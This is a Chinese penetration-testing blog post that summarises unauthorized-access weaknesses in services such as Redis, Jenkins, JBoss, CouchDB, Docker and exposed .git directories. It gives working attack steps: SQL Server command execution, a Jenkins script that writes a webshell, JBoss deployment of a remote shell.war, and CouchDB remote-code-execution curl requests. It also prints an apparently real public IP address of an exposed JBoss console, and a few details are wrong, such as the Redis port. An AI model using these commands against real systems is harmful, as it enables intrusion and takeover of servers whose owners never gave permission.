---
title: 常见未授权访问漏洞实用技巧
date: 2021-03-12 13:49:42
tags: 渗透
sidebar: [toc,webinfo]
categories: [渗透]
---

前言


未授权访问漏洞是常见的攻击入口点，某些严重的未授权访问会直接导致getshell，熟悉常见的未授权访问漏洞排查方法对红蓝双方都有很大的帮助。

本文对常见的未授权访问利用所需的工具和命令做总结。

<!-- more -->

### mysql


3306端口未授权访问，可读取数据库内容，可尝试在web路径写webshell

工具：Navicat

### sqlserver


1433端口未授权访问，可读取数据库内容，可尝试执行master..cmdshell

```
1 exec master.xp..cmdshell 'whoami'
2 exec master..cmdshell 'dir c:\'
```
工具：Navicat


### MongoDB


27017端口未授权访问，可读取数据库内容

工具：Navicat，Robo3T


### Redis


27017端口未授权访问，可读取数据库内容

可通过四种方式getshell：写webshell、写crontabs、写ssh公钥、Redis主从复制(4.x,5.x)

工具：Redis-cli,fofa:protocol=redis


### Hadoop


Hadoop webUI界面未授权访问，如果存在New Application API功能，可尝试getshell

工具：浏览器，https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py


### Elasticsearch


9200端口未授权访问，可非法操作数据
```
1 http://ip:9200/_plugin/head/  web管理界面
2 http://ip:9200/_cat/indices  查看集群当前状态
3 http://ip:9200/_nodes  查看节点数据
4 http://ip:9200/_river/_search  查看数据库敏感信息
```
工具：浏览器


### ZooKeeper


2181，2182端口未授权访问，可读取敏感信息，或者在Zookeeper集群内执行kill命令

工具：netcat，https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip


### SpringBoot


SpringBoot，web中env路径配置文件未授权访问，可暴露大量联动设备密码信息



工具：浏览器


### ds_store


http://ip/.ds_store未授权访问，可通过github工具下载web目录



工具：https://github.com/lijiejie/ds_store_exp


### VNC


vnc用于远程桌面控制，默认端口在5900-5905之间，此类端口未授权访问会导致恶意用户直接控制受控主机



工具：VNCview


### Docker


docker的2375端口web未授权访问，可通过访问ip:2375/version验证，有可能造成执行目标服务器容器命令如container、image等



工具：浏览器


### Jenkins


Jenkins面板http://ip:8080/manage未授权访问会允许用户选择执行脚本界面，操作一些系统层命令
```
1 println "whoami".execute().text 命令执行
2 new File ("/var/www/html/shell.php").write('<?php phpinfo(); ?>'); 写webshell
```
工具：浏览器


### Memcached


Memcached是一套常用的key-value分布式高速缓存系统，由于其设计缺陷没有权限控制模块，若11211端口的服务对公网开放，攻击者无需授权即可通过命令访问Memcached中的敏感信息。

```
1 telnet ip 11211 或 nc -vv <target> 11211
2 无需用户名密码，可以直接连接memcache服务的11211端口
3 stats #查看memcache服务状态

```
工具：netcat，telnet


### JBOSS


JBOSS的webUI界面http://ip:8080/jmx-console未授权访问(或默认密码admin/admin)，可导致JBoss的部署管理的信息泄露，攻击者也可以直接上传木马获取webshell

```
1 点击JMX CONSOLE未授权访问
2 点击jboss.deployment中的deploymentScanner进入应用部署页面
3 使用apache搭建远程木马服务器shell.war
4 addurl-java.lang.String配置访问木马地址http://<ip>/shell.war
5 访问http://ip:8080/shell/
```
http://221.229.247.184:8080/jmx-console/

工具：浏览器，fofa：”JBoss Management”


### svn


.svn目录未授权访问，可能导致大量源码泄露

```
1svn-extractor.py --url "url with .svn available"

```
工具：https://github.com/anantshri/svn-extractor


### git


.git目录未授权访问，可能导致大量源码泄露

方法1

```
1 wget -r -p -np -k http://www.xxx.com/.git/ #先递归批量下载.git目录
2 git log #查看网站的提交记录
3 git reset --hard [log hash] #恢复到指定版本号
```
方法2

```
GitHack.py http://www.xxx.com/.git/
```
工具：git,https://github.com/lijiejie/GitHack


### nfs


nfs默认端口2049，配置不当时，可以远程挂载nfs的共享目录

```
1 apt install nfs-common 安装nfs客户端
2 showmount -e xx.xx.xx.xx 查看nfs服务器上的共享目录
3 mount -t nfs xx.xx.xx.xx:/grdata /mnt 挂载到本地
4 umount /mnt 卸载目录
```
### CouchDB


CouchDB的webui未授权访问时，可通过 http://xx.xx.xx.xx:5984/_utils/ 页面创建管理员用户，并通过put方式远程代码执行（CVE-2017-12635）

```
1 curl -X PUT 'http://admin:admin@xx.xx.xx.xx:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
2 curl -X PUT 'http://admin:admin@xx.xx.xx.xx:5984/vultest'
3 curl -X PUT 'http://admin:admin@xx.xx.xx.xx:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
4 curl -X POST 'http://admin:admin@xx.xx.xx.xx:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

```
工具：curl，https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py



作者：Leticia,文章来源：Leticia'S Blog